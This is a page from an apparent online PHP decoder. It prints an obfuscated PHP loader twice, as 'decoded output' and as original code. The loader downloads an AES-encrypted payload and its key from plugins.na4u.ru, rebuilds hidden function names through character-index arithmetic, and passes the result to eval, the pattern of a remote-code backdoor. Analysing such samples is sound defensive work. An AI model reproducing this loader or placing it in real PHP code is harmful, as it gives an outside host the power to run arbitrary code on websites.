Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $GLOBALS['_1629699620_']=Array(base64_decode('dX' .'JsZGVj' .'b2' .'R' .'l')); $en..
Decoded Output download
<?php
$GLOBALS['_1629699620_']=Array(base64_decode('dX' .'JsZGVj' .'b2' .'R' .'l'));
$encrypted = file_get_contents('http://plugins.na4u.ru/commands/bible1_22-25.txt');
$method = "AES-192-CBC";
$key = file_get_contents('http://plugins.na4u.ru/commands/bible11_1-7.txt');
$x01 = openssl_decrypt($encrypted, $method, $key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING, "11.1-7");
echo $x01;
$encrypted = file_get_contents('http://plugins.na4u.ru/commands/The_Creation_of_the_World.txt');
$method = "AES-192-CBC";
$key = file_get_contents('http://plugins.na4u.ru/commands/bible1_22-25.txt');
$x02 = base64_decode(openssl_decrypt($encrypted, $method, $key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING, ".22-25"));
echo $x02;
function _1628618307($i){
global $x01;
$a=Array(
$x01
);return base64_decode($a[$i]);}
$_0=$GLOBALS['_1629699620_'][0](_1628618307(0));
$_1=$_0[round(1+1+1)] .$_0[round(1.2+1.2+1.2+1.2+1.2)] .$_0[round(8.25+8.25+8.25+8.25)] .$_0[round(30)];
$_2=$_0[round(33)] .$_0[round(2.5+2.5+2.5+2.5)] .$_0[round(4.8+4.8+4.8+4.8+4.8)] .$_0[round(5+5)] .$_0[round(6+6+6+6)];
$_3=$_2[0] .$_0[round(4.5+4.5+4.5+4.5)] .$_0[round(0.75+0.75+0.75+0.75)] .$_2[0] .$_2[1] .$_0[round(4.8+4.8+4.8+4.8+4.8)];
$_4=$_0[round(1.75+1.75+1.75+1.75)] .$_0[round(0+4.3333333333333+4.3333333333333+4.3333333333333)];
$_1.=$_0[round(11+11)] .$_0[round(36)] .$_0[round(7.25+7.25+7.25+7.25)] .$_0[round(26)] .$_0[round(15+15)] .$_0[round(16+16)] .$_0[round(11.666666666667+11.666666666667+11.666666666667)] .$_0[round(8.6666666666667+8.6666666666667+8.6666666666667)] .$_0[round(15+15)];
eval($O00O0O(
$x02
));
?>
Did this file decode correctly?
Original Code
<?php
$GLOBALS['_1629699620_']=Array(base64_decode('dX' .'JsZGVj' .'b2' .'R' .'l'));
$encrypted = file_get_contents('http://plugins.na4u.ru/commands/bible1_22-25.txt');
$method = "AES-192-CBC";
$key = file_get_contents('http://plugins.na4u.ru/commands/bible11_1-7.txt');
$x01 = openssl_decrypt($encrypted, $method, $key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING, "11.1-7");
echo $x01;
$encrypted = file_get_contents('http://plugins.na4u.ru/commands/The_Creation_of_the_World.txt');
$method = "AES-192-CBC";
$key = file_get_contents('http://plugins.na4u.ru/commands/bible1_22-25.txt');
$x02 = base64_decode(openssl_decrypt($encrypted, $method, $key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING, ".22-25"));
echo $x02;
function _1628618307($i){
global $x01;
$a=Array(
$x01
);return base64_decode($a[$i]);}
$_0=$GLOBALS['_1629699620_'][0](_1628618307(0));
$_1=$_0[round(1+1+1)] .$_0[round(1.2+1.2+1.2+1.2+1.2)] .$_0[round(8.25+8.25+8.25+8.25)] .$_0[round(30)];
$_2=$_0[round(33)] .$_0[round(2.5+2.5+2.5+2.5)] .$_0[round(4.8+4.8+4.8+4.8+4.8)] .$_0[round(5+5)] .$_0[round(6+6+6+6)];
$_3=$_2[0] .$_0[round(4.5+4.5+4.5+4.5)] .$_0[round(0.75+0.75+0.75+0.75)] .$_2[0] .$_2[1] .$_0[round(4.8+4.8+4.8+4.8+4.8)];
$_4=$_0[round(1.75+1.75+1.75+1.75)] .$_0[round(0+4.3333333333333+4.3333333333333+4.3333333333333)];
$_1.=$_0[round(11+11)] .$_0[round(36)] .$_0[round(7.25+7.25+7.25+7.25)] .$_0[round(26)] .$_0[round(15+15)] .$_0[round(16+16)] .$_0[round(11.666666666667+11.666666666667+11.666666666667)] .$_0[round(8.6666666666667+8.6666666666667+8.6666666666667)] .$_0[round(15+15)];
eval($O00O0O(
$x02
));
Function Calls
base64_decode | 2 |
file_get_contents | 2 |
Stats
MD5 | 8add22e32b9c4751b2e184327cd12ee4 |
Eval Count | 0 |
Decode Time | 57 ms |